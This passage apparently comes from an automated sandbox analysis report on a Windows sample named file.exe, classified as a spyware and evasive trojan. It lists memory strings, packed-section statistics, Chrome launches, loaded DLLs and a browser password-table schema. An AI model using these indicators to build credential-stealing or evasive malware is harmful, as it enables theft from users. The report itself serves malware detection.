              Source: file.exeBinary or memory string: OriginalFilename vs file.exe
              Source: file.exe, 00000000.00000003.1649772933.00000000058EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508347068.00000000059CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515653167.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1549722541.000000000597E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1520434886.0000000005E9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1549838946.000000000117C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516728657.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524421895.0000000005D7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510954701.0000000005E2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1549838946.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO/ vs file.exe
              Source: file.exe, 00000000.00000003.1521840740.0000000005D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1512903421.0000000005F0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508923668.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1521562149.0000000005FEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524958238.0000000005ECF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1525692239.0000000005D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1511351914.0000000005D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515238191.0000000005E6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1684199646.0000000005D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1683311588.00000000058ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515109066.0000000005D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1650012944.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1549980672.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515513016.0000000005E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509174365.0000000005EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517792104.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1512052608.0000000005E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1523683635.0000000005EC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508805661.0000000005E1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1650012944.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO/ vs file.exe
              Source: file.exe, 00000000.00000003.1521313888.0000000005EB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1511699488.0000000005D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1519334088.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513585155.0000000005E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510141848.0000000005D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509559342.0000000005ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514711274.0000000005E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513419119.0000000005D77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510508818.0000000005E24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515911760.0000000005D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524261802.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509042834.0000000005E20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517628908.0000000005E8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524087586.0000000005EB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1523908150.0000000005D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1522344832.0000000005FF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510748735.0000000005D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514143215.0000000005D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515370560.0000000005D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518075280.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518713501.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513042881.0000000005D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1512270591.0000000005F0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1515794554.0000000005E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518236658.0000000005D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1550083825.0000000001182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO/ vs file.exe
              Source: file.exe, 00000000.00000003.1510366321.0000000005D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514570774.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1674087974.0000000001173000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518885233.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1523512374.0000000005D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513877882.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513217737.0000000005E50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509755859.0000000005E18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1684666679.0000000006126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524596212.0000000005ECC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1525142377.0000000006021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517485417.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508038511.0000000005B72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509657739.0000000005D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517038958.0000000005D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1513719739.0000000005F2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518397625.0000000005E83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516574448.0000000005E74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516878681.0000000005E77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509943335.0000000005D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1522835114.0000000005EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514278215.0000000005E53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1520010429.0000000005D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517330127.0000000005F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509845320.0000000005ED0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1524780164.0000000005D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1519080721.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509283917.0000000005D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1522107746.0000000005EB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514427989.0000000005F40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1519766213.0000000005FBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1521106238.0000000005D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510240991.0000000005E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508455661.0000000005D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1518558245.0000000005F9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508573129.00000000059C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508128656.00000000059CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514849932.0000000005D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1520879454.0000000005FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1511178279.0000000005EF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508690678.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1517176553.0000000005E73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1512640770.0000000005E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1514972293.0000000005E63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1509464403.0000000005E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1512390680.0000000005D72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1683311588.00000000058C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
              Source: file.exe, 00000000.00000003.1514013519.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1523153348.0000000005FE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510041672.0000000005E2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516435062.0000000005D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516297330.0000000005F61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1510646054.0000000005ED6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000002.1674087974.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO/ vs file.exe
              Source: file.exe, 00000000.00000003.1517950589.0000000005E8C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1522609214.0000000005D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1516064144.0000000005E62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1511509715.0000000005E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1508233758.0000000005D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1650012944.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974345090759076
              Source: file.exeStatic PE information: Section: hcvjgapr ZLIB complexity 0.9946209113477865
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@11/8
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1399226474.00000000058ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1384429252.00000000058F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 42%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2004,i,10944876540401575079,9840924559391252716,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1908,i,6104721456568846231,4380768281653123136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2004,i,10944876540401575079,9840924559391252716,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1908,i,6104721456568846231,4380768281653123136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
